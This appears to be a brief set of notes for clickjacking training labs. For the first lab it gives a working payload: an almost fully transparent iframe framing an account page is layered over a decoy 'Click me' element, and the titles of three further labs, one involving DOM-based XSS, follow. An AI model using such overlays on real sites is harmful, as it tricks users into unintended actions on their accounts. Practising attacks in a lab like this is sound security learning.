labs
Lab - 1: Basic clickjacking with CSRF token protection (A)
<style>
iframe {
position: relative;
width: 500px;
height: 700px;
opacity: 0.000001;
z-index: 2;
}
div {
position: absolute;
top: 500px;
left: 60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe
src="https://0ad900cd0472cff4c0ee18530078002c.web-security-academy.net/my-account"
></iframe>Lab - 2: Clickjacking with form input data prefilled from a URL parameter (A)
Lab - 3: Clickjacking with a frame buster script (A)
Lab - 4: Exploiting clickjacking vulnerability to trigger DOM-based XSS (P)
Last updated

